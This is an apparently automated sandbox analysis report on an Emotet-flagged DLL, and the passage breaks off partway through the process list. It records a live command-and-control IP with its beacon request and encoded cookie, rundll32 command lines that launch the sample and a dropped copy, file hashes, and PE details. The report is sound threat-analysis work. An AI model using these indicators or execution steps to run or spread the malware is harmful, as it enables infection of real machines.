	yFAXc9z51V.dll	Get hash	malicious	Browse	51.178.61.60
	9fC0as7YLE.dll	Get hash	malicious	Browse	51.178.61.60
	FIyE6huzxV.dll	Get hash	malicious	Browse	51.178.61.60
	V0gZWRXv8d.dll	Get hash	malicious	Browse	51.178.61.60
	t5EuQW2GUF.dll	Get hash	malicious	Browse	51.178.61.60
	uh1WyesPlh.dll	Get hash	malicious	Browse	51.178.61.60
	8rryPzJR1p.dll	Get hash	malicious	Browse	51.178.61.60
	a65FgjVus4.dll	Get hash	malicious	Browse	51.178.61.60
	bWjYh6H8wk.dll	Get hash	malicious	Browse	51.178.61.60
	ZJOHKItBoJ.dll	Get hash	malicious	Browse	51.178.61.60
	eyPPiz3W6u.dll	Get hash	malicious	Browse	51.178.61.60
	02D6463C8D80183F843D874AB427C11FC47B6B9CE4726.exe	Get hash	malicious	Browse	51.178.61.60
	HjYSwxqyUn.dll	Get hash	malicious	Browse	51.178.61.60
	f47YPsvRI3.dll	Get hash	malicious	Browse	51.178.61.60
	2n64VXT08V.dll	Get hash	malicious	Browse	51.178.61.60
	qUr4bXsweR.dll	Get hash	malicious	Browse	51.178.61.60
	52O6evfqQT.dll	Get hash	malicious	Browse	51.178.61.60
	ONEitXKvz6.dll	Get hash	malicious	Browse	51.178.61.60
	1w9i8K6AzWV5RmHTSn8.dll	Get hash	malicious	Browse	51.178.61.60

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.2494680817234889
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4U:BJiRdwfu2SRU4U
MD5:	EBC01D09E4776004C48E38DD9CC1C7E0
SHA1:	47F70F0E7705F8FE5B632CD1C69A6887E39A46E4
SHA-256:	4D3A81DEDF6E8D2B1BDC8044F2C21A39C57A420107CE36A7F55E99F5FD214CA2
SHA-512:	23368AA1ED6F4E3BFE53B6AFCA0950029C6ADC832253530261571333C0EBD5C43219F42121AB8CBF611BB6DBB51ECA98057C53DA541FA16C174DCCBB824B9D6F
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xcf3885da, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.2505891853070036
Encrypted:	false
SSDEEP:	384:r70+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:r7LSB2nSB2RSjlK/+mLesOj1J2
MD5:	84C645A4F3EA6559043893E28D1A54FD
SHA1:	5A42CA0DB8DD09CCE816C763F01EC130485D9C5E
SHA-256:	0DD4A7C9740C622A5248A5EFAB7380DC00B1913ABA66033F0AE71084EB92A64A
SHA-512:	CD4A49FAB80E7B7CE7E06A29EE35CCA66C8989B490CFB1F7ACE5517AE0E82FBE6E63F499E142E8B99B12F29F5233738490F4FCC50FCA2BAC4E64B27DDCD3A6A1
Malicious:	false
Preview:	.8..... ................e.f.3...w........................)..........ys.5....y}.h.(..........ys...)..............3...w...........................................................................................................B...........@...................................................................................................... ......................................................................................................................................................................................................................................................0.....ys..................B.$.....ys.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07600344746124589
Encrypted:	false
SSDEEP:	3:Fr7vTXGPrlVrmOr/EjiYt/li/nrlqll3Vkttlmlnl:5r7GPrvrmOr1IMPrQ3
MD5:	B42E59309E363A6E1B2068822BE1F885
SHA1:	F7C9BB33DF3BCA2A929D2D8E7DE17EFB46A11191
SHA-256:	7C5CBE1FADFE488C3C5CDAA934959F760B53B069F1F87FC5B2F5D7C294CD5B90
SHA-512:	689577BBF74C28A4C831DC1B4F822376A4F9C24B94052FE9B4C3686BA2659D2A83B4A0AED7D8B02DF76DD560DB75D660C5E4A529B33FFBB8178F20F723431484
Malicious:	false
Preview:	C........................................3...w..6....y.......ys..............ys......ys.n.E......y;}.................B.$.....ys.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.178857454664225
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Clipper DOS Executable (2020/12) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	5YO8hZg21O.dll
File size:	485376
MD5:	5396135926f3d561823702e15191897a
SHA1:	d69e5939a0fdac94d31fb7c782727e9e8bced2a0
SHA256:	ac0c7a80d4eaf440526bd4b902e31bac13c09c94ca946dbd5591fd7c09d668f2
SHA512:	a5fc21c55600a1d34298eccad34d91b6591c451d1d5476c3167874feebe6f2e600024b561069355c0b33c33eeaafa7712f6164433f088ac89a2ce1c8b82c4566
SSDEEP:	12288:bdv8jkvzqZvv2wLBgmTi12yD88kYwZ1h1:b2Zvv2crTi1v0Z1h
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................................................................................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10015826
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61964C08 [Thu Nov 18 12:50:16 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	261bae8b02d2e7bf979e55d76b9dc786

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F29A48FAB27h
call 00007F29A48FAF7Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F29A48FA9D8h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F29A48E696Eh
mov dword ptr [esi], 1003B3E8h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B3F0h
mov dword ptr [ecx], 1003B3E8h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F29A48E693Bh
mov dword ptr [esi], 1003B404h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003B40Ch
mov dword ptr [ecx], 1003B404h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 1003B3DCh
push eax
call 00007F29A48FE236h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F29A48FAB2Ch
push 0000000Ch
push esi
call 00007F29A48F9FADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F29A48FAA9Fh
push 0004CC44h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4d710	0x5c0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4dcd0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0x24410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x33a0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x498f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3b000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3930c	0x39400	False	0.530729735262	data	6.66187646144	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3b000	0x13cfe	0x13e00	False	0.464512087264	data	5.41556152438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4f000	0x252c	0x1800	False	0.223795572917	data	3.845062089	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0x24410	0x24600	False	0.818527169244	data	7.74950915823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x33a0	0x3400	False	0.71484375	data	6.58405020621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x758d0	0x98	ASCII text, with CRLF line terminators	English	United States
REGISTRY	0x75968	0x260	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x75bc8	0x69c	data	English	United States
RT_BITMAP	0x52220	0x23467	data	English	United States
RT_STRING	0x76268	0x26	data	English	United States
RT_VERSION	0x75688	0x244	data	English	United States
RT_MANIFEST	0x76290	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
KERNEL32.dll	GetErrorMode, GetThreadErrorMode, GetCommandLineA, GetEnvironmentStringsW, GetCurrentProcessorNumber, IsDebuggerPresent, GetTickCount64, AreFileApisANSI, GetOEMCP, GetCommandLineW, TlsAlloc, GetCurrentThreadId, GetSystemDefaultUILanguage, MultiByteToWideChar, RaiseException, GetLastError, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, WriteFile, GetCurrentThread, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, FreeEnvironmentStringsW, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, InterlockedFlushSList, RtlUnwind, LocalFree, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, TlsFree, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, EncodePointer, GetSystemDefaultLangID, GetACP, SwitchToThread, IsProcessorFeaturePresent, UnregisterApplicationRestart, IsSystemResumeAutomatic, GetProcessHeap, CloseHandle, ReadFile, FindClose, GetUserDefaultUILanguage, FindNextFileA, SetStdHandle, WriteConsoleW, CreateFileW, GetCurrentProcess, SetUnhandledExceptionFilter, FlushFileBuffers, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, UnhandledExceptionFilter
USER32.dll	GetMenuCheckMarkDimensions, GetForegroundWindow, AnyPopup, CloseClipboard, GetClipboardViewer, GetWindowLongW, GetKBCodePage, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, SetWindowLongW, CharNextW, UnregisterClassW, DestroyCaret, EmptyClipboard, GetDialogBaseUnits, GetShellWindow, GetOpenClipboardWindow
GDI32.dll	SetBkMode, SetTextColor, CreateFontW, DeleteDC, BitBlt, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, SelectObject, GetDeviceCaps, GetTextMetricsW
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteW, SHGetFolderPathW
ole32.dll	CoFreeUnusedLibraries, CoUninitialize, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	LoadRegTypeLib, SysAllocStringLen, SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, VariantClear, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
abziuleoxsborpb	2	0x10001570
aejkroaebsbxdnkhb	3	0x10001430
amgshvm	4	0x10001340
bjtmgxqrshhlmbh	5	0x10001320
ciqnowraabbra	6	0x100013e0
cmiqzvq	7	0x10001450
crprctzst	8	0x10001360
cwiynhgawsfh	9	0x100012f0
dhfyfrdbpo	10	0x100012c0
dvmyigplnf	11	0x10001480
erlpzdqhrlacaxnda	12	0x10001440
euduauchas	13	0x100014b0
fjorczheej	14	0x10001390
fqtruzg	15	0x100014c0
fzxvmnutn	16	0x100014d0
ghrfpkc	17	0x10001280
ghrmmrvezk	18	0x10001530
hjbgnfzrilso	19	0x100015d0
hvbblczdjkdx	20	0x10001310
ifsmmtyjag	21	0x10001310
jbgiwxjtyvvaxuitk	22	0x10001410
jhjtpuvq	23	0x10001260
jovvzziqyeznb	24	0x100015a0
kbkufclc	25	0x100014e0
kxpdpqduritjwfv	26	0x10001560
lfirwsslmgzmfg	27	0x10001330
mdaepyqwwigtzy	28	0x10001500
meqzizr	29	0x10001350
mmykgdmikdunzlhbb	30	0x10001520
mxqliouinhlsqvw	31	0x100013b0
mzxbssgzqetjmifs	32	0x10001490
ndzjkcaftnq	33	0x10001510
nfwlevhbaunupm	34	0x100013c0
njhdfbkyxqtwtcvsa	35	0x10001300
nmzgdiluzbemovs	36	0x10001400
obsypougzzamg	37	0x100013d0
oqzjqpsxbjh	38	0x100012d0
ormmaboaiinycs	39	0x10001230
pejacnmfhwmlhqc	40	0x10001340
pzgjkxaqryk	41	0x100015b0
qlsxhmuh	42	0x10001240
rykrtqanuszehh	43	0x10001550
sktlwejyhkbweva	44	0x100014a0
sromrbjt	45	0x10001460
txrogplicljtdlky	46	0x100012e0
tywxzfemhfuvwwqtq	47	0x10001270
ukeirvjwemstdk	48	0x10001250
usfroye	49	0x10001370
varapmou	50	0x100013a0
vjfbgya	51	0x100015c0
vpzxnmg	52	0x10001590
wniijfgeibtaumvma	53	0x100014f0
wtkpnwha	54	0x10001470
xkdmdojzjns	55	0x10001420
yumftkya	56	0x100012a0
ywkvngmohrw	57	0x10001380
ywwwgcpzcec	58	0x10001580
yyldomdvsymz	59	0x10001290
zdcdzgtngf	60	0x100012b0
zwxnlwalmcbgmt	61	0x100013f0
zzvywuxdvuecsm	62	0x10001540

Version Infos

Description	Data
InternalName	Erulfuaekg.dll
FileVersion	3.3.7.9
ProductName	Erulfuaekg
ProductVersion	3.3.7.9
FileDescription	asdzxcqwe123
OriginalFilename	Erulfuaekg.dll
Translation	0x0408 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/19/21-01:03:01.299338	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49744	443	192.168.2.6	51.178.61.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2021 01:03:01.299338102 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:01.299386024 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:01.299500942 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:01.324035883 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:01.324065924 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:01.432221889 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:01.432307959 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.351885080 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.351917028 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.352219105 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.352296114 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.366249084 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.408890963 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.630460024 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.630532980 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.630543947 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.630573034 CET	443	49744	51.178.61.60	192.168.2.6
Nov 19, 2021 01:03:02.630585909 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.630613089 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.632251978 CET	49744	443	192.168.2.6	51.178.61.60
Nov 19, 2021 01:03:02.632281065 CET	443	49744	51.178.61.60	192.168.2.6

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49744	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-19 00:03:02 UTC	OUT	GET /GQAhghQYtMriyhSsHMSeUCAGKsKrpTqI HTTP/1.1 Cookie: BVq=wHBtME3BTvrsq6ERaxvqV74K175PcHA24bIWLDvPLoS1yKbr56Te7Vwjn8yCzOb5uzKJ+NM/RhoV/mJ/gEOd2piZqQlfbkOPLRNqvIQh34bv6jYQ4eiZWAF5phOpnxaIL7NaJmqh2Rh3BnY6Al2CP1ZA3YwrRE+JwhxIfOAtxkeWKcmFs+sB1vzHELNH5hCfiAG33DpQULpyZwsTzH1N2WMTRxF8XKCrAEZVjYtSxpcgZyxbIS111PWiNLscb+HuEFGnWkXsxMJgHhIGJCK0WJlO7KRDP6W4uiWwbI3Rqiedq147jj+TLE3bLUWRJYyiP8n0GEM= Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-19 00:03:02 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Nov 2021 00:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-11-19 00:03:02 UTC	IN	Data Raw: 32 36 65 0d 0a d8 16 c7 19 cc b1 92 b2 9a 50 37 0f 86 dc 8e 80 3f ed ff 0e 99 a3 66 bb 2a bf 8e ac 21 24 02 49 cd 90 db d7 cb 90 40 d3 f2 9f 8c d2 04 63 e6 3c 04 2c fd 18 a9 41 02 ea 29 de c1 6b c8 08 36 a3 ef b9 ea 85 bf c1 85 85 0c 16 02 09 e5 aa 0d e6 51 92 26 6d d4 b6 59 01 67 07 8b 54 60 a6 6e c0 e4 00 61 9d 0c 21 19 bf a9 87 ff 5f 85 f4 43 77 f0 7c b2 36 4a 69 e9 e2 48 48 c0 2b e7 5d 3c a9 a1 5f 74 e1 5e 8a c5 b1 48 4e 66 33 64 eb ae 41 17 82 cd 39 0a 7c 22 07 bf 60 ea f4 45 35 65 ea aa 31 de 2a 06 76 a4 bc 02 8f a3 21 1b 9f 9e 27 0f 98 68 f4 b4 93 be b4 75 d3 d5 ee 6c 9f 35 ba f6 9e b8 62 94 bc fd 03 ba 0e 1f f7 6e 9b aa e0 08 4d a0 e0 7a 8f e1 fe 79 a4 f0 59 dc c2 e7 b4 5f 1f 46 62 46 76 f1 55 76 e8 40 7b ef 20 95 e7 86 93 14 ec 1c 7b c0 e7 37 21 Data Ascii: 26eP7?f!$I@c<,A)k6Q&mYgT`na!_Cw\|6JiHH+]<_t^HNf3dA9\|"`E5e1v!'hul5bnMzyY_FbFvUv@{ {7!

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6668 Parent PID: 5468

General

Start time:	01:01:32
Start date:	19/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll"
Imagebase:	0xd30000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.462832524.0000000000B7A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6736 Parent PID: 6668

General

Start time:	01:01:32
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6780 Parent PID: 6668

General

Start time:	01:01:33
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.458372363.00000000032B5000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6792 Parent PID: 6736

General

Start time:	01:01:33
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.406496894.00000000034AA000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6876 Parent PID: 6668

General

Start time:	01:01:37
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,abziuleoxsborpb
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.459119053.000000000341A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6888 Parent PID: 560

General

Start time:	01:01:37
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7020 Parent PID: 6668

General

Start time:	01:01:45
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,aejkroaebsbxdnkhb
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.462364516.0000000002F9A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7140 Parent PID: 6792

General

Start time:	01:01:57
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 772 Parent PID: 6780

General

Start time:	01:01:59
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo",xBPZ
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.471606182.0000000000B2A000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 6276 Parent PID: 6876

General

Start time:	01:02:14
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
